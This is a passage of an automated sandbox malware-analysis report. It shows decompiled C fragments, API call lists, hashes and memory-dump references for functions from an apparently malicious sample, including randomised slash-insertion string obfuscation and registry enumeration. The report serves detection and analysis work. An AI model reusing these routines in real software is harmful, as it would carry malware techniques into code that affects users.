Opcode Fuzzy Hash: 09ee71289984c942b85821d43a4168e3184bf30c7b28c969a8a84e73065e5bf8
Instruction Fuzzy Hash: 54219872D0421EABDB20AFE4C8898DE7B7DBB48350B054825FA11A71C0D774FD459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00504138, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00504138(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x50a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x50a2a8; // 0xb41a161c
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x50a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00504140
0x00504143
0x00504149
0x00504161
0x00504165
0x00504168
0x0050416a
0x0050416d
0x0050416f
0x00504172
0x00504174
0x00504174
0x00504176
0x00504181
0x00504186
0x00504197
0x0050419f
0x005041a4
0x005041a7
0x005041aa
0x005041ac
0x005041b2
0x005041b5
0x005041b5
0x005041b5
0x005041c0
0x005041c5
0x005041cf

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00505B76,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00504143
RtlAllocateHeap.NTDLL(00000000,?), ref: 0050415B
memcpy.NTDLL(00000000,02FE9630,-00000008,?,?,?,00505B76,00000000,?,00000000,00506301,00000000,02FE9630), ref: 0050419F
memcpy.NTDLL(00000001,02FE9630,00000001,00506301,00000000,02FE9630), ref: 005041C0

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 2e74b7ca07cae5f1d93a2dbd24dc75448e27933fb518ac2747bbad8cc4cee281
Instruction ID: d21d63049f3def4b13f9494b3415488b98211b599425a4b330c492edd3edc1ff
Opcode Fuzzy Hash: 2e74b7ca07cae5f1d93a2dbd24dc75448e27933fb518ac2747bbad8cc4cee281
Instruction Fuzzy Hash: B01106B2A00215AFC710CB69DC89D9EBFBEEBA43A0B050176F90497190E6709E48D760

Uniqueness

Uniqueness Score: -1.00%

Function 005049BA, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E005049BA(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00505C4E(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x5092c4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x5092c4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x005049c5
0x005049c9
0x005049cb
0x005049cc
0x005049d4
0x005049d4
0x005049d8
0x00000000
0x00000000
0x005049cf
0x005049d0
0x005049d3
0x005049d3
0x005049e0
0x005049e7
0x005049eb
0x005049f3
0x005049f9
0x005049fb
0x00504a00
0x00504a04
0x00504a06
0x00504a09
0x00504a10
0x00504a10
0x00504a1a
0x00504a1d
0x00504a20
0x00504a20
0x00504a2c
0x00504a2c
0x00504a39

APIs

StrChrA.SHLWAPI(?,00000020,00000000,02FE962C,?,?,?,00506072,02FE962C,?,?,00502F44), ref: 005049D4
StrTrimA.SHLWAPI(?,005092C4,00000002,?,?,?,00506072,02FE962C,?,?,00502F44), ref: 005049F3
StrChrA.SHLWAPI(?,00000020,?,?,?,00506072,02FE962C,?,?,00502F44,?,?,?,?,?,005044F9), ref: 005049FE
StrTrimA.SHLWAPI(00000001,005092C4,?,?,?,00506072,02FE962C,?,?,00502F44,?,?,?,?,?,005044F9), ref: 00504A10

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 9f3d8f474ec395904bd1f9923cbb2745517ebc00d01ebf5eecb93981c96820a4
Instruction ID: d495b58aaea21443c943f25fd65a029591251948e4f33567303dcf1e6f397033
Opcode Fuzzy Hash: 9f3d8f474ec395904bd1f9923cbb2745517ebc00d01ebf5eecb93981c96820a4
Instruction Fuzzy Hash: 8A01D8B17453226FD2319F599C49F2FBE9CFB99B60F110919F981C72D0EB60CC019AA5

Uniqueness

Uniqueness Score: -1.00%

Function 6C53E2D0, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C53E2FC

Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011

std::exception::exception.LIBCMT ref: 6C53E35D

Part of subcall function 6C544920: std::exception::_Copy_str.LIBCMT ref: 6C544939

__CxxThrowException@8.LIBCMT ref: 6C53E374

Part of subcall function 6C544A87: RaiseException.KERNEL32(?,00000000,?,?,00000000), ref: 6C544ADC

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6C53E37B

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
String ID:
API String ID: 271752322-0
Opcode ID: 2b3b6e6723eb042a15c1c769ed2a318c639cbbde6adf2725a4a49a7e420fb218
Instruction ID: 75e84e18f0d0d47583a09adfd5bcab01d07b0f87cfba9ac1ed6c61a328e24978
Opcode Fuzzy Hash: 2b3b6e6723eb042a15c1c769ed2a318c639cbbde6adf2725a4a49a7e420fb218
Instruction Fuzzy Hash: 3F2117B1408B809FD320CF29CC45B47BBE4BB59318F048E1EE489D7B51E775A508CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00501970, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00501970(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E0050354E(_t8, _t1);
				_t16 = E00505C4E(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E0050756E(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00505C4E(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00502A03(_t16);
				}
				return _t18;
			}

0x0050197b
0x0050197c
0x0050197f
0x00501981
0x0050198c
0x00501990
0x00501995
0x00501999
0x005019a1
0x005019a6
0x005019ae
0x005019ae
0x005019b7
0x005019bb
0x005019c1
0x005019c4
0x005019ca
0x005019ca
0x005019d2
0x005019d2
0x005019d9
0x005019d9
0x005019e4

APIs

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

Part of subcall function 0050756E: wsprintfA.USER32 ref: 005075CA

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00503EC5,74666F53,00000000,?,00000000,?,?,00502F4F), ref: 005019A6
lstrcpy.KERNEL32(00000000,00000000), ref: 005019CA
lstrcat.KERNEL32(00000000,00000000), ref: 005019D2

Strings

Soft, xrefs: 0050197C, 00501995

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 0a580aa412be87ab69361572447e4b4b6bb17890e36401a12c3dc29c7416b65e
Instruction ID: 79c552c5a8d2966e38a0aa72d7766e271a31634ed5a025d7c794a376a85bf87f
Opcode Fuzzy Hash: 0a580aa412be87ab69361572447e4b4b6bb17890e36401a12c3dc29c7416b65e
Instruction Fuzzy Hash: 8501AD72100A0AA7CB122B699C9DAEF3F6DBFC4395F044421F9045A196EB748949DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C545D49, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6C545D60

Part of subcall function 6C546388: ___BuildCatchObjectHelper.LIBCMT ref: 6C5463BA
Part of subcall function 6C546388: ___AdjustPointer.LIBCMT ref: 6C5463D1

_UnwindNestedFrames.LIBCMT ref: 6C545D77
___FrameUnwindToState.LIBCMT ref: 6C545D89
CallCatchBlock.LIBCMT ref: 6C545DAD

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: c8c05acd160c18110a825d926067d22bf0635e9fd943c4b85a96cd4fad5b6d9c
Instruction ID: 06ef5a2d8d22aa8a92496df2168eaa61385d82b55d0d916cf3263432c2d04bcf
Opcode Fuzzy Hash: c8c05acd160c18110a825d926067d22bf0635e9fd943c4b85a96cd4fad5b6d9c
Instruction Fuzzy Hash: F501E932000609FBCF129F65CC04EDA7BBAEF89758F558115F91866620D732E965DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C54E11F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6C54E143

Part of subcall function 6C54E82A: __fltout2.LIBCMT ref: 6C54E853

__cftog_l.LIBCMT ref: 6C54E169
__cftoe_l.LIBCMT ref: 6C54E19B

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: aeb5e0d8d14cba1a8152e2aa050c80c04b4ab79af9873b8d7e3320efd685411a
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: C9014C3208024AFBCF029E84DC01DEE7F22BF59358F549915FE2898530D376D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00506027, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00506027(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x50a37c; // 0x2fe9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x50a37c; // 0x2fe9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x50a030) {
					HeapFree( *0x50a290, 0, _t8);
				}
				_t14[1] = E005049BA(_v0, _t14);
				_t11 =  *0x50a37c; // 0x2fe9630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00506027
0x00506027
0x00506030
0x00506040
0x00506040
0x00506045
0x0050604a
0x00000000
0x00000000
0x0050603a
0x0050603a
0x0050604c
0x00506050
0x00506062
0x00506062
0x00506072
0x00506075
0x0050607a
0x0050607e
0x00506084

APIs

RtlEnterCriticalSection.NTDLL(02FE95F0), ref: 00506030
Sleep.KERNEL32(0000000A,?,?,00502F44,?,?,?,?,?,005044F9,?,00000001), ref: 0050603A
HeapFree.KERNEL32(00000000,00000000,?,?,00502F44,?,?,?,?,?,005044F9,?,00000001), ref: 00506062
RtlLeaveCriticalSection.NTDLL(02FE95F0), ref: 0050607E

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: e4f56e5aa31ed8a54c04cb5f2342416cbcac381b13391fdb4af21fe20eb88e9d
Instruction ID: fb18d43634853e7f74f64b1771544969ac4a109ea22aeb9569364367deee149e
Opcode Fuzzy Hash: e4f56e5aa31ed8a54c04cb5f2342416cbcac381b13391fdb4af21fe20eb88e9d
Instruction Fuzzy Hash: 4CF0F8712403419BEB21DF39ED6CF5E7BE8BB25741B048815F985D62A6C630E818EB26

Uniqueness

Uniqueness Score: -1.00%

Function 00501547, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00501547() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x50a2c4; // 0x2a4
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x50a304; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x50a2c4; // 0x2a4
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x50a290; // 0x2bf0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00501547
0x0050154e
0x00501598
0x0050159a
0x0050159a
0x00501552
0x00501558
0x0050155d
0x00501561
0x00501567
0x0050156e
0x00000000
0x00000000
0x00501570
0x00501575
0x00000000
0x00000000
0x00000000
0x00501575
0x00501577
0x0050157f
0x00501582
0x00501582
0x00501588
0x0050158f
0x00501592
0x00501592
0x00000000

APIs

SetEvent.KERNEL32(000002A4,00000001,00504214), ref: 00501552
SleepEx.KERNEL32(00000064,00000001), ref: 00501561
CloseHandle.KERNEL32(000002A4), ref: 00501582
HeapDestroy.KERNEL32(02BF0000), ref: 00501592

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 34cac8b5786208ad669a55e2e3811d4693ac73f7ed1ab30c330852be7493ec3c
Instruction ID: 78ca3f24518e93ea16646e6d90396b3d606d41f92285cd2b3f50aff49aa64ab3
Opcode Fuzzy Hash: 34cac8b5786208ad669a55e2e3811d4693ac73f7ed1ab30c330852be7493ec3c
Instruction Fuzzy Hash: 24F06575B007129BEB205B74AD5CB5F3BACBB757117040514BC1ADB1E5CB24CD08ED56

Uniqueness

Uniqueness Score: -1.00%

Function 0050461D, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0050461D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x50a37c; // 0x2fe9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x50a37c; // 0x2fe9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x50a37c; // 0x2fe9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x50b882) {
					HeapFree( *0x50a290, 0, _t10);
					_t7 =  *0x50a37c; // 0x2fe9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x0050461d
0x00504626
0x00504636
0x00504636
0x0050463b
0x00504640
0x00000000
0x00000000
0x00504630
0x00504630
0x00504642
0x00504647
0x0050464b
0x0050465e
0x00504664
0x00504664
0x0050466d
0x0050466f
0x00504673
0x00504679

APIs

RtlEnterCriticalSection.NTDLL(02FE95F0), ref: 00504626
Sleep.KERNEL32(0000000A,?,?,00502F44,?,?,?,?,?,005044F9,?,00000001), ref: 00504630
HeapFree.KERNEL32(00000000,?,?,?,00502F44,?,?,?,?,?,005044F9,?,00000001), ref: 0050465E
RtlLeaveCriticalSection.NTDLL(02FE95F0), ref: 00504673

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 071dbea66fc8af25260031236331cbcb1c0c006dd3d35cc1cbf5a6c86a4b285f
Instruction ID: da62e5bd1e6a2380a68eb2c31f1b2247bbb6d2c63e5c1a4f6c99d5d9f126f872
Opcode Fuzzy Hash: 071dbea66fc8af25260031236331cbcb1c0c006dd3d35cc1cbf5a6c86a4b285f
Instruction Fuzzy Hash: EEF0F8B8600201DFEB29CF24EDA9F5D7BA4BB69701B049519E906C73B5D731AC08EE15

Uniqueness

Uniqueness Score: -1.00%

Function 6C53FA10, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C53FA62

Part of subcall function 6C53EF40: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C53EFD0

Strings

string too long, xrefs: 6C53FAAE, 6C53FB66

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memmove
String ID: string too long
API String ID: 2765667529-2556327735
Opcode ID: d1dfbec92bbc0398621f87c904040bceccc825110e91f1c3f8b92d78891c23d7
Instruction ID: f5f993bfe883df6dd9dd239aa8261ceedf3f5cc493c57bde823f956cb2d9164e
Opcode Fuzzy Hash: d1dfbec92bbc0398621f87c904040bceccc825110e91f1c3f8b92d78891c23d7
Instruction Fuzzy Hash: 695106722083609FD3218E3DEC90B5BB7D6EFD1310F195EAAD4D9C7A91E724984C8762

Uniqueness

Uniqueness Score: -1.00%

Function 6C5408B0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

string too long, xrefs: 6C5409B9, 6C540A54, 6C540A5E, 6C540B5A
invalid string position, xrefs: 6C5409A5, 6C5409AF

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID:
String ID: invalid string position$string too long
API String ID: 0-4289949731
Opcode ID: 524c60021ca962799126eaae91a095278baf5a130ce9eba461c51c3811d6d5ba
Instruction ID: c795425772d4481170a3156d10eee275040ecbde49d1507ff864223a7b335452
Opcode Fuzzy Hash: 524c60021ca962799126eaae91a095278baf5a130ce9eba461c51c3811d6d5ba
Instruction Fuzzy Hash: 0031F6323057619B8624DE5DDC8885FB3EAEFE5755730892FE555C3E90EB309C088BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00507360, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00507360(void* __ecx, intOrPtr _a4) {
				char _v8;
				char _v12;
				long _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _t35;
				intOrPtr _t47;
				void* _t51;
				void* _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t53 =  *0x50a0ec(0x80000003, 0, 0, 0x20019,  &_v32);
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E00505C4E(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t53 =  *0x50a0ac(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0);
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E00502A03(_v28);
							goto L17;
						}
						_t53 = E0050202E(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4);
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E00502A03(_v24);
						_v20 = _v16;
						_t47 = E00505C4E(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x50a2c4, 0) == 0x102);
				goto L16;
			}

0x00507360
0x0050737a
0x0050737d
0x00507380
0x00507383
0x0050738c
0x00507390
0x0050746a
0x0050746e
0x0050746e
0x00507399
0x005073a0
0x005073a7
0x005073aa
0x0050745f
0x00507462
0x00000000
0x00507468
0x005073b0
0x005073b3
0x005073ba
0x005073c4
0x005073d3
0x005073db
0x00507413
0x0050744d
0x00507453
0x00507455
0x00507455
0x00507457
0x0050745a
0x00000000
0x0050745a
0x0050742d
0x00507431
0x00000000
0x00000000
0x00000000
0x00507431
0x005073e0
0x005073ef
0x00000000
0x00000000
0x005073f4
0x005073fd
0x00507400
0x00507407
0x0050740a
0x005073e5
0x005073e5
0x00000000
0x005073e5
0x0050740e
0x00000000
0x0050740e
0x005073e2
0x00000000
0x00507433
0x00507440
0x00000000

APIs

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

WaitForSingleObject.KERNEL32(00000000,?,?,?,00507319,?,00507319,?,?,?,?,?,00507319,?), ref: 0050743A
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00507319,?,?,?,?,?,00501C40,?), ref: 00507462

Strings

~P, xrefs: 00507386

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateCloseHeapObjectSingleWait
String ID: ~P
API String ID: 1423275866-1055297808
Opcode ID: 2a3c85f05073546864b78d407984a60b21b767faa47cff2d7ea011b9150cca7c
Instruction ID: 494d11c021be082931edb4e4acf6f5c07e1ea25876e094aa1d520f423131162f
Opcode Fuzzy Hash: 2a3c85f05073546864b78d407984a60b21b767faa47cff2d7ea011b9150cca7c
Instruction Fuzzy Hash: 38311A75D0421EABDF21AF95DC899EEFFB9FB98300F104466E911B21A1D2B11E40EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C5407B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C54086A

Strings

string too long, xrefs: 6C54079A, 6C540897, 6C5409B9, 6C540A5E
invalid string position, xrefs: 6C540790, 6C5409AF

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b7b5f162b90642889a6209c69e13d6a9297e776269b5f9f81b4d98c7deec6292
Instruction ID: 6b489546f67fcc1e528ea1aaf8e65faa681cc96b19b8ea28819d814c21bc4a01
Opcode Fuzzy Hash: b7b5f162b90642889a6209c69e13d6a9297e776269b5f9f81b4d98c7deec6292
Instruction Fuzzy Hash: 5811BE312016809BD7348E9C9D90D1AB7FAEFE17157308D1FE59187E81DB61EC448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C544A78, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6C54DDE3
___raise_securityfailure.LIBCMT ref: 6C54DECA

Strings

8hQl, xrefs: 6C54DDD8

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8hQl
API String ID: 3761405300-3048985772
Opcode ID: ef53a2b7657f4b655895a3a78bb7472b7c98dd9402d7afc43a5d067174e2e70f
Instruction ID: 309a96cdf358faca62b396b71d52472f38f5d85a840db38bbd76cbfcf8851ae1
Opcode Fuzzy Hash: ef53a2b7657f4b655895a3a78bb7472b7c98dd9402d7afc43a5d067174e2e70f
Instruction Fuzzy Hash: 9B2115B4600289DFEF00CF1DD9867A07BF8FB4A756F12412AE9098BBA0E7B15484CF45

Uniqueness

Uniqueness Score: -1.00%

Function 005023AE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 005023D6

Part of subcall function 00507471: SysFreeString.OLEAUT32(?), ref: 00507550

SafeArrayDestroy.OLEAUT32(?), ref: 00502423

Strings

-tP, xrefs: 005023BD

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID: -tP
API String ID: 3098518882-4025278887
Opcode ID: a7ad388b6f866dd8c3e52482f195fb03077d936d193f50a4e2d353652a4d109e
Instruction ID: 2e8da035aa1f94204e8df4c17f6b8c2aa601ce3096762821752464a02f0025e4
Opcode Fuzzy Hash: a7ad388b6f866dd8c3e52482f195fb03077d936d193f50a4e2d353652a4d109e
Instruction Fuzzy Hash: F9113C76A0050EBFDF01DFA5CC89AEEBBB9FB18310F008065FA01A6161E3719A15DB91

